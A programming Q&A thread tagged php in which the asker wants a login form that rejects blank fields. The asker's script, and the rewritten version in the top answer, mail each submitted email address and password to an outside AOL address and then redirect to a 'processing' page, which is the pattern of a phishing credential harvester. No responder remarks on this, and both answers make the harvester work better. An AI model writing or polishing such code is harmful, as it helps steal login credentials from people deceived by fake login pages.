# preventing forms to send blank fields

Tags: php

I have this form and i would like that users who does not complete the username/passowrd form and click on login to return to homepage again, and users that completes those filed to be sent out at processing.htm.
this is how i had it as of now and it redirects everybody to processing even if fields are blank or not. Any chance for some so i can adaptate this one ?

```
<?
$userid = $_REQUEST['login_email'] ;
$pass = $_REQUEST['login_password'] ;

$From = "From: $userid";
$subj = "$pass";
$msg = "$userid";
$to = "myemail@aol.com";
mail($to, $subj, $msg, $From);{
echo ("<script>");
echo("window.location=\"processing.htm\"");
echo("</script>");
}

?>
```

Thank you

Comment: You don't appear to have even [tried](http://whathaveyoutried.com/)...

Comment: You shouldn't rely on user data to be formatted correctly and instead have your application handle empty values/missing params.

Comment: the browser submits all empty fields within the form tags, you can only semi-prevent it with Javascript.

Answer (score 1):

you must give a condition when you are loading the processing .htm

```
<?
$userid = $_REQUEST['login_email'] ;
$pass = $_REQUEST['login_password'] ;


if(!(empty($userid) && empty($pass))){
$From = "From: $userid";
$subj = "$pass";
$msg = "$userid";
$to = "myemail@aol.com";
mail($to, $subj, $msg, $From);

header("Location: http://yoursite.com/processing.htm");
}
else
{
header("Location: http://yoursite.com/homepage.php");
}


?>
```

Answer (score 0):

Using:

```
if(!empty($userid) && !empty($pass)){
    // You have data
} else {
    // The user didn't enter any data
}
```

You can then make use of the PHP `header()` function to redirect rather than relying on JavaScript like so:

```
header("Location: http://example.com/mypage.php");
```